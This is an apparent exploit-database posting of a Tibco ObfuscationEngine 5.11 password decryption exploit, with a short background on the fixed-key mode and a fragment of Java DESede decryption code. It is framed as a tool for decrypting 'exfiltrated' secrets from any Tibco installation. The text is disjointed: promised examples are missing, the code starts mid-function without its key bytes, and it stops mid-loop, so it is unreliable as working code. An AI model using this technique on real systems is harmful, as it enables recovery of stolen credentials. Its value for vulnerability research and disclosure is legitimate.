Exploits / Vulnerability Discovered : 2020-12-09 |
Type : local |
Platform : multiple
This exploit / vulnerability Tibco obfuscationengine 5.11 fixed key password decryption is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption
# Date: December 8th 2020
# Exploit Author: Tess Sluijter
# Vendor Homepage: https://www.tibco.com
# Version: 5.11x and before
# Tested on: MacOS, Linux, Windows
# Tibco password decryption exploit
## Background
Tibco's documentation states that there are three modes of operation for this ObfuscationEngine tooling:
1. Using a custom key.
2. Using a machine key.
3. Using a fixed key.
This write-up pertains to #3 above.
Secrets obfuscated using the Tibco fixed key can be recognized by the fact that they start with the characters #!. For example: "#!oe2FVz/rcjokKW2hIDGE7nSX1U+VKRjA".
## Issues
On Tibco's forums, but also on other websites, people have already shared Java code to decrypt secrets encrypted with this fixed key. For example:
Regardless of country, customer, network or version of Tibco, any secret that was obfuscated with Tibco's ObfuscationEngine can be decrypted using my Java tool. It does **not** require access to Tibco software or libraries. All you need are exfiltrated secret strings that start with the characters #!. This is not going to be fixed by Tibco, this is a design decision also used for backwards compatibility in their software.
## Instructions
Compile with:
javac decrypt.java
Examples of running, with secrets retrieved from websites and forums:
ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(message);
Cipher decipher = Cipher.getInstance(algo);
int i = decipher.getBlockSize();
byte[] ivSetup = new byte[i];
byteArrayInputStream.read(ivSetup);
SecretKey key = new SecretKeySpec(keyBytes, 0, keyBytes.length, "DESede");
decipher.init(2, key, new IvParameterSpec(ivSetup));
// Magic, I admit I don't understand why this is needed.
CipherInputStream cipherInputStream = new CipherInputStream(byteArrayInputStream, decipher);
char[] plaintext;
char[] arrayOfChar1 = new char[(message.length - i) / 2];
byte[] arrayOfByte4 = new byte[2];
byte b = 0;